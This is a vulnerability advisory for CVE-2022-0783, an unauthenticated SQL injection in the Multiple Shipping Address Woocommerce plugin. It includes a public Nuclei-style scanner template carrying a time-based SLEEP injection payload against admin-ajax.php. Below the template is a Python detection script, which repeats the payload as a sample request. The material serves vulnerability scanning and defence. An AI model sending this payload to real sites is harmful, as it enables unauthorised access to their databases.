The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
PoC code [public]
id: CVE-2022-0783

info:
  name: Multiple Shipping Address Woocommerce < 2.0 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
  remediation: |
    Update the Multiple Shipping Address Woocommerce plugin to version 2.0 or later.
  reference:
    - https://wpscan.com/vulnerability/4d594424-8048-482d-b61c-45be1e97a8ba/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0783
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.6
    cve-id: CVE-2022-0783
    cwe-id: CWE-89
    epss-score: 0.37807
    epss-percentile: 0.97111
    cpe: cpe:2.3:a:themehigh:multiple_shipping_addresses_for_woocommerce:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: themehigh
    product: multiple_shipping_addresses_for_woocommerce
    fofa-query: body="wp-content/plugins/multiple-shipping-address-woocommerce"
  tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(7)))zsme)

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "len(body) == 5"
          - "status_code==200"
          - "regex('false$', body)"
        condition: and
# digest: 4a0a00473045022047b0963d0785392958b27ac902d5f174bc997f33bd487074e3d4461c53dd96bc022100c130abf10b42cd20870c126144d34962ce4c0223c3e2590a3055498a9eb8e1e7:922c64590222798bb761d5b6d8e72950
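
A defensive check for the request shape the template above sends, as an added example that is not part of the original page or of the plugin's code: it flags admin-ajax.php requests whose `sid` for the `ocwma_choice_address` action is not a bare integer, which is useful for triaging captured request bodies on sites still running a version before 2.0. The function names, the sample requests and the assumption that a legitimate `sid` is numeric are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

AJAX_SUFFIX = "/wp-admin/admin-ajax.php"
WATCHED_ACTIONS = {"ocwma_choice_address"}  # action named in the template above
PLAIN_ID = re.compile(r"[0-9]{1,20}")       # assumption: a legitimate sid is a bare integer


def check_request(target, body):
    """Return a finding string for a suspicious request, or None if it looks benign."""
    url = urlsplit(target)
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith(AJAX_SUFFIX):
        return None
    # WordPress accepts `action` from the query string or the form body, so merge both.
    params = parse_qs(url.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    if not WATCHED_ACTIONS & set(params.get("action", [])):
        return None
    for value in params.get("sid", []):
        # parse_qs has already decoded '+' and %xx, so encoding tricks do not hide the value.
        if not PLAIN_ID.fullmatch(value):
            return f"non-numeric sid for watched action: {value!r}"
    return None


# Constructed sample requests (target, form body); the second body is the one from the template.
SAMPLES = [
    ("/wp-admin/admin-ajax.php", "action=ocwma_choice_address&sid=3"),
    ("/wp-admin/admin-ajax.php",
     "action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(7)))zsme)"),
    ("/shop/wp-admin/admin-ajax.php?action=ocwma_choice_address", "sid=not-a-number"),
    ("/wp-admin/admin-ajax.php", "action=heartbeat&sid=x"),
]


def scan(samples):
    """Return (target, finding) for every sample that check_request flags."""
    findings = []
    for target, body in samples:
        finding = check_request(target, body)
        if finding:
            findings.append((target, finding))
    return findings


if __name__ == "__main__":
    for target, finding in scan(SAMPLES):
        print(target, "->", finding)
```

A match is a triage signal only; the fix remains the update to version 2.0 or later given in the remediation field.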